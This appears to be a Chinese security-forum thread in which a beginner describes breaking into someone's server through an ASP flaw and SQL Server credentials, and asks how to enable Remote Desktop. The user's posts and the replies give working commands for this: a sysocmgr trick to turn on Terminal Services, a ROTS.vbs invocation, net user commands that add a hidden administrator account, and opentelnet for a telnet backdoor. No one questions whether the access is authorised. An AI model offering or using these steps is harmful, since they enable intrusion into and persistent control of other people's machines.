|
 | 作者: fnever [fnever]
 论坛用户 |
登录 |
| 今天运气不错,用了个asp 漏洞得到了1433的sql用户名和密码 用sqlexec连上去,成功了(真兴奋。。。) 可以用dir。。。但叫人头疼的问题来了: 想用3389吧,首先当然是想到用tftp咯,开了服务,那边连。。。connection failed.晕。ping先我自己,不通。。。 又用他ping 了下我能ping 通的ip,也ping不通?为什么??? 然后想到开匿名ipc失败。。 接着用net start telnet ,看了下,有了,但xscan扫下,23没开,也telnet不上。。。 又用 echo [Components] > d:\ss echo TSEnable = on >> d:\ss sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\ss /q 又失败。。。 想到了用echo >>自己写个asp木马上去,可惜发现sqlexec不能写#$%等字符,晕。。。。。。。 真的没辙了。哪位高手能指点一下啊,谢谢了 net user还是成功了,就是开不了3389 帮忙想办法啊 |
| 地主 发表时间: 10/22 01:10 |
| 回复: fnever [fnever] 论坛用户 |
登录 |
|
也想到写个注册表文件的。。。 可是如果用regedit aa.reg的命令的话是不会自动导入的 会弹个gui对话框叫你确定,我就没办法了。 |
| B1层 发表时间: 10/22 01:12 |
 | 回复: seleven [seleven]  论坛用户 |
登录 |
|
cscript ROTS.vbs xxx.xxx.xxx.xxx name pass 3389 /r |
| B2层 发表时间: 10/22 04:59 |
| 回复: fnever [fnever] 论坛用户 |
登录 |
|
ROTS.vbs 被norton认为是 病毒,没了,估计被杀了? |
| B3层 发表时间: 10/22 05:28 |
| 回复: fnever [fnever] 论坛用户 |
登录 |
|
误解了,不好意思 但好象是Error description: 缺少对象. 是不是要对方开135才可以? |
| B4层 发表时间: 10/22 05:32 |
| 回复: xuebaby [xuebaby]  论坛用户 |
登录 |
|
现在ping不通据说是因为冲击波的缘故,好象是说冲击波也总是在用ping命令ping别人的机子吧(只是听说,不保证可靠性) 至于你能用SQL用dir命令 那么也就可以用那个漏洞用sqlcmd用下面的命令建立一个管理员帐号吖 net user user /add net user user password net localgroup administrators user /add "user"表示用户名,"password"则是口令 拥有管理员权限的话,就可以再用opentelnet.exe给他的机子开启一个90端口的telnet,telnet上去之后再用命令把3389开启 开启3389之后再重启一下就好了。 当然也可以直接下个开启终端的软件copy到他的机子上,然后用at命令执行也好,用telnet上去执行也好。 |
| B5层 发表时间: 10/22 08:24 |
| 回复: seleven [seleven] 论坛用户 |
登录 |
|
ROTS.vbs是远程的,你自己别杀就是了 在本机运行的! 我才郁闷呢! 一只鸡 我用ROTS.vbs根本连不上! 只能用SRV和NTLM开telnet 然后能telnet 也能影射谁告诉我怎么才能开3389? 有超级用户 能只能用SRV和NTLM开telnet 不能用脚本 谁给点建议? 我想到Remote Administrator 可是Remote Administrator怎样才连上他? 他那边也装? [此贴被 猫头鹰(seleven) 在 10月22日11时01分 编辑过] |
| B6层 发表时间: 10/22 11:20 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 有谁教我接下来怎么办。。。。